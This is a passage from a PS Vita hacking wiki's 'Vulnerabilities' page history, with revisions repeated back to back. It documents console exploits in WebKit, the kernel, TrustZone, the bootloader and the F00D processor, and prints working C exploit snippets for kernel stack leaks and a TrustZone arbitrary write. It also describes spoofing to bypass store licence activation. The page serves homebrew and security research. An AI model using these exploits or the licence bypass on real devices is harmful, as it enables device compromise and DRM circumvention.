SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. We can mod eMMC MBR to change block size. But yifan was trying to exploit it with an adjacent malloc(controlled_size) and couldn't find a way so just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx find the way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10563Vulnerabilities2019-02-02T21:55:10Z<p>Xyz: /* Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. We can mod eMMC MBR to change block size. But yifan was trying to exploit it with an adjacent malloc(controlled_size) and couldn't find a way so just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx find the way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10562Vulnerabilities2019-02-02T21:53:04Z<p>Xyz: /* octopus exploit */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
